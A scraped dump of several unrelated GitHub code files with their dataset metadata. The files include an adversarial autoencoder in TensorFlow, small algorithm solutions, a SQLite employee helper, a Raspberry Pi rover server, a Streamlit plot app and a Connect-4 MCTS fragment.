tf.random.normal(tf.shape(y_fake), mean=1.0, stddev=0.01),\n # y_true=tf.ones_like(y_fake),\n # y_pred=y_fake\n # )\n fake_loss = - tf.reduce_mean(y_fake)\n\n return fake_loss\n\n # == Keras functions ==\n def compile(self, learning_rate=.0001, **kwargs):\n super(AdversarialAutoencoder, self).compile(learning_rate=learning_rate, **kwargs)\n\n self.recon_opt = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n self.disc_opt = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n self.dec_opt = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n\n def build(self, input_shape):\n super(AdversarialAutoencoder, self).build(input_shape)\n\n # Additionally, we need to build the discriminator\n self.m_disc = self.get_discriminator(tf.keras.layers.Flatten()(self.m_enc.output).shape)\n\n @tf.function\n def train_step(self, data):\n x_train = data[0]\n y_train = data[1]\n batch_size = x_train.shape[0]\n\n # 1) Overall AE should reconstruct the input samples\n with tf.GradientTape() as recon_tape:\n y_pred = self(x_train, training=True)\n recon_loss = self.recon_loss(y_true=x_train, y_pred=y_pred)\n\n recon_grad = recon_tape.gradient(recon_loss, self.m_enc.trainable_variables + self.m_dec.trainable_variables)\n self.recon_opt.apply_gradients(zip(recon_grad, self.m_enc.trainable_variables + self.m_dec.trainable_variables))\n\n # 2) Train the discriminator\n with tf.GradientTape() as disc_tape:\n # Get the code layer's reaction on the input\n t_code_x = self.m_enc(x_train, training=False)\n t_code_x = tf.keras.layers.Flatten()(t_code_x)\n t_code_noise = tf.random.normal(tf.shape(t_code_x))\n\n # Ask the discriminator what's real and what's fake\n t_disc_real = self.m_disc(t_code_noise, training=True)\n t_disc_fake = self.m_disc(t_code_x, training=True)\n\n disc_loss = self.disc_loss(y_real=t_disc_real, y_fake=t_disc_fake)\n\n disc_grad = disc_tape.gradient(disc_loss, self.m_disc.trainable_weights)\n if self.clipping_val:\n disc_grad, _ = tf.clip_by_global_norm(disc_grad, self.clipping_val)\n self.disc_opt.apply_gradients(zip(disc_grad, self.m_disc.trainable_weights))\n\n # 3) Train the encoder\n with tf.GradientTape() as dec_tape:\n # The code layer should look like \"real\" samples\n t_code_x = self.m_enc(x_train, training=True)\n t_code_x = tf.keras.layers.Flatten()(t_code_x)\n t_y_pred = self.m_disc(t_code_x, training=False)\n\n dec_loss = self.enc_loss(t_y_pred)\n\n dec_grad = dec_tape.gradient(dec_loss, self.m_enc.trainable_variables)\n if self.clipping_val:\n dec_grad, _ = tf.clip_by_global_norm(dec_grad, self.clipping_val)\n self.dec_opt.apply_gradients(zip(dec_grad, self.m_enc.trainable_variables))\n\n return {\n \"Reconstruction Loss\": recon_loss,\n \"Discriminator Loss\": disc_loss,\n \"Encoder Loss\": dec_loss\n }\n\n def call(self, inputs, training=None, mask=None):\n # Connect the encoder and decoder\n t_encoded = self.m_enc(inputs, training=training, mask=mask)\n t_decoded = self.m_dec(t_encoded, training=training, mask=mask)\n\n return t_decoded\n\n\nclass AdversarialClustering(AdversarialAutoencoder):\n def __init__(self, n_clusters: int = 5, **kwargs):\n super(AdversarialClustering, self).__init__(**kwargs)\n\n # Configuration\n self.n_clusters = n_clusters\n\n # We have another discriminator\n self.m_disc_cluster = None\n self.opt_disc_cluster = None\n\n def compile(self, learning_rate=.0001, **kwargs):\n # In our evaluation, the loss diverged for high learning rates: we'll lower it to 1e-5\n if learning_rate > 1e-5:\n learning_rate = 1e-5\n print(\"The learning rate for the AAE clustering model was lowered to 1e-5.\")\n\n super(AdversarialClustering, self).compile(learning_rate=learning_rate, **kwargs)\n\n self.opt_disc_cluster = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n\n def build(self, input_shape):\n # This is on purpose: we need to adapt the building method of the AAE\n super(AdversarialAutoencoder, self).build(input_shape=input_shape)\n\n # Additionally, we need to build the discriminator\n self.m_disc = self.get_discriminator(tf.keras.layers.Flatten()(self.m_enc.output[0]).shape, name=\"code_disc\")\n self.m_disc_cluster = self.get_discriminator(tf.keras.layers.Flatten()(self.m_enc.output[1]).shape, name=\"cluster_disc\")\n\n def build_extractors(self):\n # Don't do anything here - this model is only for clustering\n pass\n\n def _dense_encoder(self, input_shape):\n\n # Up to the latent space it's the same as the usual AAE\n m_enc_pre = tf.keras.Sequential(name=\"encoder\")\n add_dense(\n m_enc_pre, layer_dims=self.layer_dims[:-1], p_dropout=self.p_dropout,\n activation=\"leakyrelu\", input_shape=input_shape[1:], use_bias=self.use_bias,\n add_batch_norm=True\n )\n\n # There are two outputs: the latent space and the clusters\n t_code = tf.keras.layers.Dense(self.layer_dims[-1], name=\"code\")(m_enc_pre.output)\n t_clust = tf.keras.layers.Dense(self.n_clusters, activation=\"softmax\", name=\"cluster\")(m_enc_pre.output)\n\n # Form one overall model\n m_enc = tf.keras.Model(\n m_enc_pre.inputs, [t_code, t_clust]\n )\n\n return m_enc\n\n def _dense_decoder(self, input_shape, output_dim):\n # We do have two inputs: concatenate them\n in_code = tf.keras.layers.Input(shape=input_shape[0][1:])\n in_clust = tf.keras.layers.Input(shape=input_shape[1][1:])\n in_tot = tf.keras.layers.Concatenate()([in_code, in_clust])\n\n # The rest is as in the basis AAE\n m_dec_post = tf.keras.Sequential(name=\"decoder_post\")\n add_dense(\n m_dec_post, layer_dims=list(reversed(self.layer_dims[:-1])), p_dropout=self.p_dropout,\n activation=self.hidden_activation, input_shape=in_tot.shape[1:],\n )\n # The last layer reconstructs the input\n m_dec_post.add(tf.keras.layers.Dense(\n output_dim[-1], activation=self.out_activation\n ))\n\n # Combine the multi-input with the original decoder\n m_dec = tf.keras.Model(\n [in_code, in_clust], m_dec_post(in_tot)\n )\n\n return m_dec\n\n # We use leaky ReLUs as inspired by DCGAN\n def _conv_encoder(self, input_shape, code_dim=16):\n inputs = tf.keras.layers.Input(shape=input_shape[1:])\n\n x = tf.keras.layers.Conv2D(filters=16, kernel_size=3, strides=2, padding='same')(inputs)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n x = tf.keras.layers.Conv2D(filters=32, kernel_size=3, strides=2, padding='same')(x)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n x = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=2, padding='same')(x)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n t_code = tf.keras.layers.Conv2D(filters=code_dim if self.code_dim_override is None else self.code_dim_override, kernel_size=3, strides=2, padding='valid', name=\"code\")(x)\n t_clust = tf.keras.layers.Conv2D(filters=self.n_clusters, kernel_size=3, strides=2, padding='valid', activation=\"softmax\", name=\"cluster\")(x)\n\n model = tf.keras.Model(inputs=inputs, outputs=[t_code, t_clust], name=\"encoder\")\n return model\n\n def _conv_decoder(self, input_shape, output_dim):\n in_code = tf.keras.Input(shape=input_shape[0][1:])\n in_clust = tf.keras.Input(shape=input_shape[1][1:])\n in_tot = tf.keras.layers.Concatenate()([in_code, in_clust])\n\n x = tf.keras.layers.Conv2DTranspose(filters=64, kernel_size=4, strides=2, padding='same', activation=self.hidden_activation)(in_tot)\n x = tf.keras.layers.Conv2DTranspose(filters=32, kernel_size=4, strides=2, padding='valid', activation=self.hidden_activation)(x)\n x = tf.keras.layers.Conv2DTranspose(filters=16, kernel_size=4, strides=2, padding='valid', activation=self.hidden_activation)(x)\n\n t_dec = tf.keras.layers.Conv2DTranspose(filters=1, kernel_size=4, strides=2, padding='same', activation=self.out_activation)(x)\n m_dec = tf.keras.Model(inputs=[in_code, in_clust], outputs=t_dec, name=\"decoder\")\n return m_dec\n\n def train_step(self, data):\n x_train = data[0]\n y_train = data[1]\n batch_size = tf.shape(x_train)[0]\n\n # 1) Overall AE should reconstruct the input samples\n with tf.GradientTape() as recon_tape:\n y_pred = self(x_train, training=True)\n recon_loss = self.recon_loss(y_true=x_train, y_pred=y_pred)\n\n recon_grad = recon_tape.gradient(recon_loss, self.m_enc.trainable_variables + self.m_dec.trainable_variables)\n self.recon_opt.apply_gradients(zip(recon_grad, self.m_enc.trainable_variables + self.m_dec.trainable_variables))\n\n # 2) Train the discriminators\n with tf.GradientTape() as disc_code_tape, tf.GradientTape() as disc_cluster_tape:\n # Get the code layer's reaction on the input\n t_code_x, t_cluster_x = self.m_enc(x_train, training=False)\n t_code_x = tf.keras.layers.Flatten()(t_code_x)\n t_cluster_x = tf.keras.layers.Flatten()(\n t_cluster_x\n )\n\n # Random distribution as comparison\n t_code_noise = tf.random.normal(tf.shape(t_code_x))\n t_cluster_noise = tf.one_hot(\n indices=tf.random.uniform((batch_size, ), minval=0, maxval=self.n_clusters, dtype=tf.int32),\n depth=self.n_clusters\n )\n\n # Ask the discriminator what's real and what's fake\n t_disc_code_real = self.m_disc(t_code_noise, training=True)\n t_disc_code_fake = self.m_disc(t_code_x, training=True)\n t_disc_cluster_real = self.m_disc_cluster(t_cluster_noise, training=True)\n t_disc_cluster_fake = self.m_disc_cluster(t_cluster_x, training=True)\n\n # Teach the discriminator to better distinguish between them\n disc_code_loss = self.disc_loss(y_real=t_disc_code_real, y_fake=t_disc_code_fake)\n disc_cluster_loss = self.disc_loss(y_real=t_disc_cluster_real, y_fake=t_disc_cluster_fake)\n\n # Calculate the gradients\n disc_code_grad = disc_code_tape.gradient(disc_code_loss, self.m_disc.trainable_weights)\n if self.clipping_val:\n disc_code_grad, _ = tf.clip_by_global_norm(disc_code_grad, self.clipping_val)\n disc_cluster_grad = disc_cluster_tape.gradient(disc_cluster_loss, self.m_disc_cluster.trainable_weights)\n if self.clipping_val:\n disc_cluster_grad, _ = tf.clip_by_global_norm(disc_cluster_grad, self.clipping_val)\n\n # And backpropagate them\n self.disc_opt.apply_gradients(zip(disc_code_grad, self.m_disc.trainable_weights))\n self.opt_disc_cluster.apply_gradients(zip(disc_cluster_grad, self.m_disc_cluster.trainable_weights))\n\n # 3) Train the encoder\n with tf.GradientTape() as dec_tape:\n # The code layer should look like \"real\" samples\n t_code_x, t_cluster_x = self.m_enc(x_train, training=True)\n t_code_x = tf.keras.layers.Flatten()(t_code_x)\n t_cluster_x = tf.keras.layers.Flatten()(\n t_cluster_x\n )\n\n t_code_pred = self.m_disc(t_code_x, training=False)\n t_cluster_pred = self.m_disc_cluster(t_cluster_x, training=False)\n\n dec_loss = self.enc_loss(t_code_pred) + self.enc_loss(t_cluster_pred)\n\n dec_grad = dec_tape.gradient(dec_loss, self.m_enc.trainable_variables)\n if self.clipping_val:\n dec_grad, _ = tf.clip_by_global_norm(dec_grad, self.clipping_val)\n self.dec_opt.apply_gradients(zip(dec_grad, self.m_enc.trainable_variables))\n\n return {\n \"Reconstruction Loss\": recon_loss,\n \"Discriminator Code Loss\": disc_code_loss,\n \"Discriminator Cluster Loss\": disc_cluster_loss,\n \"Encoder Loss\": dec_loss\n }\n","repo_name":"Fraunhofer-AISEC/ARGUE","sub_path":"libs/architecture/target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":28766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17222721596","text":"# Problem found & solved on Leetcode: https://leetcode.com/problems/roman-to-integer/submissions/\n\nclass Solution(object):\n\tdef romanToInt(self, s):\n\t\t\"\"\"\n\t\t\tGiven a string of Roman numerals, uses two nested recursion functions to return\n\t\tthe equivalent in Arabic numberals.\n\n\t\t:type s: str\n\t\t:rtype: int\n\n\t\t>>> Solution.romanToInt(\"I\")\n\t\t1\n\n\t\t>>> Solution.romanToInt(\"CDXLIV\")\n\t\t444\n\n\t\t>>> Solution.romanToInt(\"xcix\")\n\t\t99\n\n\t\t>>> Solution.romanToInt(\"LMNOP\")\n\t\tValueError('Input is not a Roman numeral.')\n\n\t\t>>> Solution.romanToInt(777)\n\t\tValueError('777 is not a string.')\n\n\t\t\"\"\"\n\n\t\tromanDict = {\n\t\t\t\"I\": 1,\n\t\t\t\"IV\": 4,\n\t\t\t\"V\": 5,\n\t\t\t\"IX\": 9,\n\t\t\t\"X\": 10,\n\t\t\t\"XL\": 40,\n\t\t\t\"L\": 50,\n\t\t\t\"XC\": 90,\n\t\t\t\"C\": 100,\n\t\t\t\"CD\": 400,\n\t\t\t\"D\": 500,\n\t\t\t\"CM\": 900,\n\t\t\t\"M\": 1000\n\t\t}\n\n\n\t\tdef _romanToInt(string, result=[]):\n\t\t\t\"\"\"\n\t\t\t\"\"\"\n\n\t\t\tif not string:\n\t\t\t\treturn result\n\n\t\t\tif string[0] in romanDict:\n\t\t\t\tif string[:2] in romanDict:\n\t\t\t\t\tval = romanDict[string[:2]]\n\t\t\t\t\trest = string[2:]\n\t\t\t\telse:\n\t\t\t\t\tval = romanDict[string[0]]\n\t\t\t\t\trest = string[1:]\n\n\t\t\t\tresult.append(val)\n\t\t\t\treturn _romanToInt(rest, result)\n\n\t\t\telse:\n\t\t\t\traise ValueError('Input is not a Roman numeral.')\n\n\t\t\treturn result\n\n\n\t\tdef _addRecursively(lst, num=0):\n\t\t\t\"\"\"\n\t\t\t\tGiven a list of integers, returns the sum of the list.\n\n\t\t\t>>> _addRecursively([1, 2, 3], 0)\n\t\t\t6\n\n\t\t\t>>> _addRecursively([0], 0)\n\t\t\t0\n\n\t\t\t>>> _addRecursively([7, 6, 5, 4, 7, 8, 9], 0)\n\t\t\t46\n\n\t\t\t\"\"\"\n\n\t\t\tif not lst:\n\t\t\t\treturn num\n\n\t\t\tnum += lst[0]\n\t\t\treturn _addRecursively(lst[1:], num)\n\n\n\n\t\tif not isinstance(s, str):\n\t\t\traise ValueError(\"{} is not a string\".format(s))\n\t\tfinalNum = list(_romanToInt(s.upper(), result=[]))\n\n\t\tfinalNum = _addRecursively(finalLst)\n\n\t\treturn finalNum\n\n\n","repo_name":"jennifro/practice-challenges","sub_path":"roman_to_integer.py","file_name":"roman_to_integer.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45174519725","text":"class Traverse:\n def inorderTrav(self, root):\n self.res = []\n self.helpInorder(root)\n return self.res\n\n def helpInorder(self, root):\n if not root:\n return None\n self.helpInorder(root.left)\n self.res.append(root.val)\n self.helpInorder(root.right)\n\n def preOrderTrav(self, root):\n self.res = []\n self.helpPreorder(root)\n return self.res\n\n def helpPreorder(self, root):\n if not root:\n return None\n self.res.append(root.val)\n self.helpPreorder(root.left)\n self.helpPreorder(root.right)\n\n def postOrderTrav(self, root):\n self.res = []\n self.helpPostorder(root)\n return self.res\n\n def helpPosorder(self, root):\n if not root:\n return None\n self.helpPosorder(root.left)\n self.helpPosorder(root.right)\n self.res.append(root.val)","repo_name":"benben123/algorithm","sub_path":"myAlgorithm/py/BinaryTree/BinaryTreePrePostRecur.py","file_name":"BinaryTreePrePostRecur.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45757717154","text":"import os\nimport sqlite3\n\n\ndef init_db():\n #connecting to existing database, if database not exists, it creates a new database.\n conn = sqlite3.connect('details.db')\n cursor = conn.cursor()\n print(\"Database created and opened successfully\")\n\n try:\n cursor.execute('''CREATE TABLE Dept\n (department TEXT PRIMARY KEY\n );''')\n\n print('Dept database created successfully')\n\n #insert Dept data\n cursor.execute(\"insert into Dept values ('Finance')\");\n cursor.execute(\"insert into Dept values ('Booking')\");\n cursor.execute(\"insert into Dept values ('Maintenance')\");\n cursor.execute(\"insert into Dept values ('Food')\");\n cursor.execute(\"insert into Dept values ('Product')\");\n cursor.execute(\"insert into Dept values ('Engineering')\");\n except:\n pass\n\n #create Employee table\n try:\n cursor.execute('''CREATE TABLE Employee\n (rowid INTEGER PRIMARY KEY AUTOINCREMENT,\n fname TEXT NOT NULL,\n lname TEXT,\n email TEXT NOT NULL,\n phone INT,\n salary INT,\n department TEXT,\n FOREIGN KEY (department)\n REFERENCES Dept(department));''')\n\n print('Employee database created successfully') \n\n\n #Insert data into Employee table\n cursor.execute(\"insert into Employee(fname, lname, email, phone, salary, department) values ('Sivanandham', 'RM', 'siva1342001@gmail.com', 78675532768, 50000, 'Finance')\");\n cursor.execute(\"insert into Employee(fname, lname, email, phone, salary, department) values ('Sivaram', 'T', 'siva@gmail.com', 7861554268, 55000, 'Food')\");\n cursor.execute(\"insert into Employee(fname, lname, email, phone, salary, department) values ('rahul', 'RM', 'rahul@gmail.com', 78675532768, 50000, 'Finance')\");\n cursor.execute(\"insert into Employee(fname, lname, email, phone, salary, department) values ('harish', 'RM', 'harish@gmail.com', 78675532768, 50000, 'Product')\");\n\n except Exception as e:\n print(e)\n \n\n conn.commit()\n\n print(\"Records inserted successfully\")\n\n conn.close()\n\n\n#function to insert new user into Employee data\ndef new_user(fname, lname, email, phone, salary, department):\n\n conn = sqlite3.connect('details.db')\n cursor = conn.cursor()\n cursor.execute(\"insert into Employee(fname, lname, email, phone, salary, department) values(?, ?, ?, ?, ?, ?)\", (fname, lname, email, phone, salary, department))\n conn.commit()\n conn.close()\n\n\n#function to update the department value\ndef update_dept(e_id, newdept):\n\n conn = sqlite3.connect('details.db')\n cursor = conn.cursor()\n\n query = (\n '''UPDATE Employee \n SET department = ? \n WHERE rowid = ?''')\n\n cursor.execute(query, (newdept, e_id))\n conn.commit()\n conn.close()\n\n\n#function to delete the record in Employee table\ndef deleteuser(e_id):\n\n conn = sqlite3.connect('details.db')\n cursor = conn.cursor()\n\n query = \"delete from Employee where rowid = ?\"\n cursor.execute(query, (e_id,))\n conn.commit()\n conn.close()\n \n\n#function to read Employee table records\ndef get_employee_values():\n conn = sqlite3.connect('details.db')\n cursor = conn.cursor()\n cursor.execute('select * from Employee')\n \n\n row_headers = [x[0] for x in cursor.description] \n result = cursor.fetchall()\n json_data = []\n\n for res in result:\n res = list(res)\n json_data.append(dict(zip(row_headers, res)))\n\n conn.close()\n return json_data\n\n\n#function to read Dept table records\ndef get_dept_values():\n conn = sqlite3.connect('details.db')\n cursor = conn.cursor()\n cursor.execute('select * from Dept')\n\n row_headers = [x[0] for x in cursor.description] \n result = cursor.fetchall()\n json_data = []\n\n for res in result:\n res = list(res)\n json_data.append(dict(zip(row_headers, res)))\n\n conn.close()\n return json_data\n","repo_name":"SivanandhamRM/EmployeeDetail_webpage","sub_path":"sql_func.py","file_name":"sql_func.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16854385341","text":"# silver 1\n# 11052번, 카드 구매하기\nimport sys\n\nN = int(input())\n\ncard = list(map(int, sys.stdin.readline().rstrip().split()))\n\ndp = [0] * (N+1)\n\nfor i in range(N):\n dp[i+1] = card[i]\n\nfor i in range(2, N+1):\n for j in range(i, i//2 +1):\n dp[j] = max(dp[j], dp[j-i] + dp[i])\n\nprint(dp[N])","repo_name":"Hwan9915/CodeJudge","sub_path":"BOJ/11052.py","file_name":"11052.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11152701686","text":"# vertex.py\n# Emily Freebairn\n# November 17, 2011\n# Minor changes by THC.\n# The Vertex class represents a vertex in a graph. It stores the vertex's name,\n# location, and a list of the vertices that are adjacent to it.\n\nfrom cs1lib import *\n\nRADIUS = 8 # RADIUS of the drawn vertices\nLINE_WIDTH = 3 # line width of the drawn edges\nX_CORRECTION = 4 # horizontal correction amount to display names\nY_CORRECTION = 10 # vertical correction amount to display names\n\nclass Vertex:\n # Initialize a Vertex, given its location.\n def __init__(self, name, x, y):\n self.name = name # name of this vertex\n self.x = x # x location of the vertex in pixels\n self.y = y # y location of the vertex in pixels\n self.adjacent = [] # list of adjacent vertices\n \n # Return the information about this vertex as a string, including\n # the name of the vertex, its location, and a list of names of its\n # adjacent vertices.\n def __str__(self):\n string = self.name + \"; Location: \" + str(self.x) + \", \" + str(self.y) + \\\n \"; Adjacent vertices: \"\n for i in range(len(self.adjacent)-1):\n string += self.adjacent[i].name + \", \"\n string += self.adjacent[-1].name\n return string\n \n # Draw the vertex with the color parameters given.\n def draw(self, r, g, b):\n set_fill_color(r, g, b)\n disable_stroke()\n draw_circle(self.x, self.y, RADIUS)\n \n # Draw the edge between self and the vertex given as a parameter,\n # in the color determined by the parameters.\n def draw_edge(self, vertex, r, g, b):\n enable_stroke()\n set_stroke_width(LINE_WIDTH)\n set_stroke_color(r, g, b)\n draw_line(self.x, self.y, vertex.x, vertex.y)\n \n # Draw all the edges between a vertex and the vertices in its adjacency list,\n # in the color determined by the parameters.\n def draw_neighbor_edges(self, r, g, b):\n for adjacent_vertex in self.adjacent:\n self.draw_edge(adjacent_vertex, r, g, b)\n \n # Display this vertex's name in the color determined by the parameters.\n # (Extra-credit feature.)\n def show_name(self, r, g, b):\n enable_stroke()\n set_stroke_color(r, g, b)\n set_font_size(18)\n set_font_bold()\n text_width = get_text_width(self.name)\n draw_text(self.name, self.x - text_width/2 - X_CORRECTION,\n self.y - Y_CORRECTION)\n \n # Determine whether the point (x, y) is in the box inscribing the vertex's circle.\n def is_point_near_vertex(self, x, y):\n return abs(self.x - x) <= RADIUS and abs(self.y - y) <= RADIUS\n","repo_name":"hardlyHacking/cs1","sub_path":"static/solutions/labs/bfs/solution/vertex.py","file_name":"vertex.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22444315624","text":"def process(string):\n num1, num2 = string.split(\" \")\n num1 = int(num1, 2)\n num2 = int(num2, 2)\n res = bin(num1 * num2).replace(\"0b\", \"\")\n return res\n\n\nif __name__ == \"__main__\":\n bin_string = input(\"Type 2 binary numbers with space between them\")\n print(process(bin_string))\n","repo_name":"UralmashFox/DE_Sprint","sub_path":"1_3/task_5.py","file_name":"task_5.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1291538287","text":"# -*- coding: utf-8 -*-\nimport socket\nimport RPi.GPIO as GPIO\nimport pygame\nfrom rover import forwards, motor1, motor2, motor3, motor4,halt , left, right, cutl,cutr, backwards\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nchan_list = [16,20,26,21]\nGPIO.setup(chan_list, GPIO.OUT)\n\nmotor1.start(0)\nmotor2.start(0)\nmotor3.start(0)\nmotor4.start(0)\n\nprint(\"Kører serveren\\n\")\n\nhost = \"0.0.0.0\" #IP-adressen for Raspberry Pi\nport = 3000\n\nskt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nskt.bind((host, port)) # Tilskriver IP-adressen og porten til vores socket\n\nwhile True:\n data, adresse = skt.recvfrom(64)\n dekodet_data = data.decode(\"UTF-8\")\n\n if data:\n print(\"Data modtaget: \", str(dekodet_data))\n skt.sendto(data, adresse)\n if str(dekodet_data) ==\"forwards\":\n forwards()\n elif str(dekodet_data)==\"stop\":\n halt()\n if str(dekodet_data)==\"backwards\":\n backwards()\n elif str(dekodet_data)==\"stop\":\n halt()\n if str(dekodet_data) ==\"left\":\n left()\n elif str(dekodet_data)==\"cutl\":\n cutl()\n if str(dekodet_data) ==\"right\":\n right()\n elif str(dekodet_data)==\"cutr\":\n cutr()\n else:\n print(\"Ikke mere data.\")\n break\nskt.close()\n\n","repo_name":"Jonas-ML/Programmering","sub_path":"Rover-projekt/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31188577515","text":"import streamlit as st\r\nimport seaborn as sns\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nsiteHeader = st.container()\r\ndataExploration = st.container()\r\nnewFeatures = st.container()\r\n\r\nwith siteHeader:\r\n st.title('Welcome to the Awesome Web App!')\r\n\r\nwith dataExploration:\r\n st.header('Dataset: Wisconsin cancer dataset')\r\n st.text('Found the dataset on Kaggle ')\r\n\r\ndf_data = pd.read_csv(\"https://raw.githubusercontent.com/KoushikSai01/CMSE_830_projects/main/data.csv\")\r\nprint(df_data)\r\n#choosing option-1 from the dropdown\r\n\r\nplot =['scatter', 'histogram']\r\nselected_option_0= st.selectbox(\"Which Plot do you want to plot?\", plot)\r\nst.write('You selected:', selected_option_0)\r\n\r\n\r\n\r\nif selected_option_0 == plot[1]:\r\n #choosing option-1 from the dropdown\r\n\r\n selected_option_1= st.selectbox(\"x axis feature?\", df_data.columns)\r\n st.write('You selected:', selected_option_1)\r\n #choosing option-2 from the dropdown\r\n \r\n # choosing which plot\r\n \r\n selected_option_2= st.selectbox(\"y axis feature?\", df_data.columns)\r\n st.write('You selected:', selected_option_2)\r\n \r\n fig=plt.figure(figsize=(9,7))\r\n sns.histplot(data=df_data, x=selected_option_1,y=selected_option_2, bins=20, hue=\"diagnosis\")\r\n st.pyplot(fig)\r\n \r\n\r\nif selected_option_0 == plot[0]:\r\n #choosing option-1 from the dropdown\r\n\r\n selected_option_1= st.selectbox(\"x axis feature?\", df_data.columns)\r\n st.write('You selected:', selected_option_1)\r\n #choosing option-2 from the dropdown\r\n \r\n # choosing which plot\r\n \r\n selected_option_2= st.selectbox(\"y axis feature?\", df_data.columns)\r\n st.write('You selected:', selected_option_2)\r\n \r\n fig=plt.figure(figsize=(9,7))\r\n sns.scatterplot(data=df_data, x=selected_option_1, y=selected_option_2, hue=\"diagnosis\")\r\n st.pyplot(fig)\r\n","repo_name":"KoushikSai01/CMSE_830_projects","sub_path":"ICA23sep.py","file_name":"ICA23sep.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72009735930","text":"import time\nimport difflib\n\n# load dictionary words from file\ndef load_words():\n da_words = []\n start_time = time.time()\n \n with open('da words.txt', 'r') as f:\n for line in f:\n da_words.append(line.rstrip())\n end_time = time.time()\n\n elapsed_time = end_time - start_time\n # log words loaded and elapsed time\n print('Loaded ' + str(len(da_words)) + ' words in ' + f'{elapsed_time:.2f}' + ' seconds.')\n\n return da_words\n\n#autocorrect function\n\ndef autocorrect(text, da_words):\n for w in text.casefold().split():\n if w not in da_words:\n suggestion = difflib.get_close_matches(w, da_words)\n print(f'Did you mean {\" , \".join(str(x) for x in suggestion)} instead of {w}?')\n \n elif w in da_words:\n print('Looks good!')\n\n \n return text\n\ndef main():\n da_words = load_words()\n print('Type a word or sentence or type \\\"quit\\\" to stop')\n while True:\n text = input(':> ')\n if ('quit' == text):\n break\n autocorrect(text, da_words)\n\nif __name__ == \"__main__\":\n main()\n autocorrect(text, da_words)","repo_name":"aubreyvz/Elite-Qualifier","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"93366602","text":"import random\nimport copy\nfrom P4 import *\nfrom math import sqrt, log\n\n\nC = 1.1\n\nclass Node:\n def __init__(self, etat, parent, joue, mouvement):\n self.etat = copy.deepcopy(etat)\n self.mouvement = mouvement\n self.joue = joue # booleen : donne a qui est le tour, True = c'est l'ordi qui joue\n self.parent = parent\n self.enfants = []\n self.listeScore=[0,0,0]\n self.nb_visites = 1\n \n\n def selection(self):\n if(self.enfants != []):\n poids = []\n for enfant in self.enfants:\n poids.append(int (100*enfant.calculerValeurNoeud()))\n #print(poids)\n \n tmp = random.choices(self.enfants, weights=poids)\n return tmp[0].selection()\n else:\n return self\n\n\n def extension (self) :\n if not (verif_gagnage(couleur.rouge, self.etat) or verif_gagnage(couleur.jaune, self.etat)) :\n coup_possible = liste_coup_possible(self.etat)\n for c in range (len(coup_possible)) :\n grille_tampon=copy.deepcopy(self.etat) \n colonne = coup_possible[c][0]\n if (self.joue and MCTS_COULEUR == couleur.jaune) or ((not self.joue) and MCTS_COULEUR == couleur.rouge) :\n jouer_coup(couleur.jaune, colonne, grille_tampon)\n else : \n jouer_coup(couleur.rouge, colonne, grille_tampon)\n noeud_tampon = Node(grille_tampon, self, not(self.joue), coup_possible[c])\n self.enfants.append(noeud_tampon)\n #afficher_grille(self.etat)\n \n\n def devient_racine(self) : \n del self.parent\n self.parent = None\n\n def est_racine(self) :\n return self.parent == None\n \n \n\n def simulation (self):\n res = 0\n indicateur = True \n iteration = 0\n temp = copy.deepcopy(self.etat)\n\n while (indicateur == True):\n \n liste_coup = liste_coup_possible(temp)\n if (len(liste_coup) > 0) :\n i =random.randint(0, len(liste_coup)-1)\n coup = liste_coup[i][0]\n\n \n if (self.joue and MCTS_COULEUR == couleur.jaune) or ((not self.joue) and MCTS_COULEUR == couleur.rouge):\n val = couleur.jaune\n val2 = couleur.rouge\n else:\n val = couleur.rouge\n val2 = couleur.jaune\n \n if (iteration % 2 == 0) : \n temp = jouer_coup(val, coup, temp)\n if (verif_gagnage(val, temp)):\n #afficher_grille(temp)\n if (self.joue) : \n res = 1\n else : \n res = -1\n indicateur = 0 \n \n else : \n temp = jouer_coup(val2, coup, temp)\n if (verif_gagnage(val2, temp)):\n #afficher_grille(temp)\n if (self.joue) : \n res = -1\n else : \n res = 1\n indicateur = 0\n\n iteration += 1\n else :\n #afficher_grille(temp)\n res = 0\n indicateur = 0\n \n return res \n \n\n\n\n\n\n def propagationDuResultat (self, resultat): #resultat designe le resultat de simulation\n tampon=self\n while (tampon.parent != None) : \n if(resultat==0): #nulle\n tampon.listeScore[1]+=1\n elif(resultat==1): #vicroite\n tampon.listeScore[0]+=1\n elif(resultat==-1): #perdudos\n tampon.listeScore[2]+=1 #exemple : score est de la 